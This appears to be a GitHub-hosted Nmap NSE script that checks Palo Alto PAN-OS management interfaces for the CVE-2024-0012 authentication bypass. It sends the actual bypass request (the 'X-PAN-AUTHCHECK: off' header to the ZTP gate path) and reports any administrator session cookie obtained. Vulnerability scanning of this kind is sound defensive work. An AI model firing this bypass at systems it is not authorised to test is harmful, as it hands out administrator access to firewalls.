-
Notifications
You must be signed in to change notification settings - Fork 50
/
http-vuln-cve2024-0012.nse
105 lines (89 loc) · 4.1 KB
/
http-vuln-cve2024-0012.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
description = [[
Tests for Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability (CVE-2024-0012).
An authentication bypass enables an unauthenticated attacker with network access to the management web interface
to gain PAN-OS administrator privileges.
The script attempts to bypass authentication by sending specific HTTP headers and accessing a specially crafted path.
If successful, it indicates the target is vulnerable to authentication bypass.
References:
* https://nvd.nist.gov/vuln/detail/CVE-2024-0012
* https://security.paloaltonetworks.com/CVE-2024-0012
* https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
]]
-- @usage
-- nmap -p <port> --script panos-cve-2024-0012 <target>
-- nmap -sV --script panos-cve-2024-0012 <target>
--
-- @output
-- PORT STATE SERVICE
-- 443/tcp open https
-- | panos-cve-2024-0012:
-- | VULNERABLE:
-- | Palo Alto Networks PAN-OS Authentication Bypass
-- | State: VULNERABLE
-- | Description:
-- | An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated
-- | attacker with network access to the management web interface to gain PAN-OS administrator privileges.
-- | Disclosure date: 2024-11-19
-- | Extra information:
-- | Target is vulnerable to CVE-2024-0012. Authentication bypass successful.
-- | Session cookie obtained: PHPSESSID=abc123def456ghi
-- | References:
-- | https://security.paloaltonetworks.com/CVE-2024-0012
-- |_ https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
author = "Dhiraj Mishra (@RandomDhiraj)"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}
portrule = shortport.http
local function match_response(response)
if not response or not response.body then return false end
local has_title = response.body:match("<title>Zero Touch Provisioning</title>") or
response.body:match("Zero Touch Provisioning %(ZTP%)")
local has_script = response.body:match("/scripts/cache/mainui.javascript")
local has_session = response.header["set-cookie"] and
response.header["set-cookie"]:match("PHPSESSID=")
return has_title and has_script and has_session
end
action = function(host, port)
local vuln_table = {
title = "Palo Alto Networks PAN-OS Authentication Bypass",
state = vulns.STATE.NOT_VULN,
description = [[
An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated
attacker with network access to the management web interface to gain PAN-OS administrator privileges.
]],
IDS = {CVE = 'CVE-2024-0012'},
references = {
'https://security.paloaltonetworks.com/CVE-2024-0012',
'https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/'
},
dates = {
disclosure = {year = '2024', month = '11', day = '19'},
}
}
local report = vulns.Report:new(SCRIPT_NAME, host, port)
local opts = {
header = {
["X-PAN-AUTHCHECK"] = "off",
["Connection"] = "keep-alive"
},
redirect_ok = false
}
local response = http.get(host, port, "/php/ztp_gate.php/.js.map", opts)
if response and response.status == 200 then
if match_response(response) then
vuln_table.state = vulns.STATE.VULN
vuln_table.extra_info = "Target is vulnerable to CVE-2024-0012. Authentication bypass successful."
if response.header["set-cookie"] then
vuln_table.extra_info = vuln_table.extra_info .. "\nSession cookie obtained: " ..
response.header["set-cookie"]
end
end
end
return report:make_output(vuln_table)
end
-- Reference from nuclei-templates